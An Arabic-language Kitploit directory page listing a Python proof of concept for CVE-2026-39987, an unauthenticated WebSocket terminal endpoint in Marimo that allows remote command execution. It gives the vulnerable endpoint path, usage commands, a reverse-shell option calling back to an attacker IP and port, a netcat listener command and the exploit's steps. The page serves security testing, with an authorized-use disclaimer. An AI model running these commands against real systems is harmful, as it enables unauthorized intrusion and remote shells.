Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39987_RCE_PoC — إثبات مفهوم بلغة Python للثغرة CVE-2026-39987، يستغل نقطة نهاية طرفية WebSocket غير مُصادَق عليها لتحقيق تنفيذ أوامر عن بُعد والوصول إلى صدفة عكسية. | Kitploit
أدوات/GitHubGitHub/mfahdk/cve-2026-39987_rce_poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأداة الوصول عن بعد
GitHubmfahdk/cve-2026-39987_rce_poc

CVE-2026-39987_RCE_PoC

إثبات مفهوم بلغة Python للثغرة CVE-2026-39987، يستغل نقطة نهاية طرفية WebSocket غير مُصادَق عليها لتحقيق تنفيذ أوامر عن بُعد والوصول إلى صدفة عكسية.

عرض المستودع
1منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-39987 — إثبات مفهوم تنفيذ الأوامر عن بُعد عبر WebSocket في Marimo

إثبات مفهوم لـ CVE-2026-39987، يوضح تنفيذ الأوامر عن بُعد من خلال نقطة نهاية الطرفية WebSocket المصابة بالثغرة.

إخلاء المسؤولية: هذا الإثبات مخصص للاختبار الأمني المصرح به والاستخدام التعليمي فقط. استخدمه فقط ضد الأنظمة التي تملكها أو لديك إذن صريح باختبارها.

الوصف

تسمح الثغرة لمستخدم غير مصادق عليه بالتفاعل مع نقطة نهاية الطرفية WebSocket الخاصة بالتطبيق وتنفيذ الأوامر عن بُعد.

يتصل الإثبات بـ:

root@kitploit:~
wss://<target>/terminal/ws

ويوضح تنفيذ الأوامر من خلال اتصال WebSocket.

كان الهدف المستخدم أثناء تطوير/اختبار هذا الإثبات عبارة عن بيئة مختبر Hack The Box مصرح بها.

المتطلبات

  • Python 3
  • websocket-client

قم بتثبيت المكتبة المطلوبة:

root@kitploit:~
pip3 install websocket-client

الاستخدام

root@kitploit:~
python3 test.py <domain>

مثال:

root@kitploit:~
python3 test.py somesite.com

يقوم الإثبات بإنشاء اتصال WebSocket وتنفيذ أمر اختباري.

الاتصال العكسي (Reverse Shell)

يدعم الإثبات أيضًا خيار الاتصال العكسي:

root@kitploit:~
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>

مثال:

root@kitploit:~
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444

ابدأ المستمع (listener) قبل تنفيذ الإثبات:

root@kitploit:~
nc -lvnp 4444

التفاصيل التقنية

يكشف التطبيق عن نقطة نهاية الطرفية WebSocket دون الحاجة إلى مصادقة.

يقوم الإثبات بـ:

  1. إنشاء اتصال WebSocket.
  2. تعطيل التحقق من شهادة TLS لأن الهدف في المختبر يستخدم شهادة موقعة ذاتيًا.
  3. استهلاك موجه الطرفية الأولي.
  4. إرسال أمر من خلال WebSocket.
  5. قراءة مخرجات الطرفية الناتجة.

يُعد ws.recv() الأولي مهمًا لأن الخادم يرسل موجه الصدفة (shell prompt) فورًا بعد إنشاء الاتصال.

تنزيل الأداة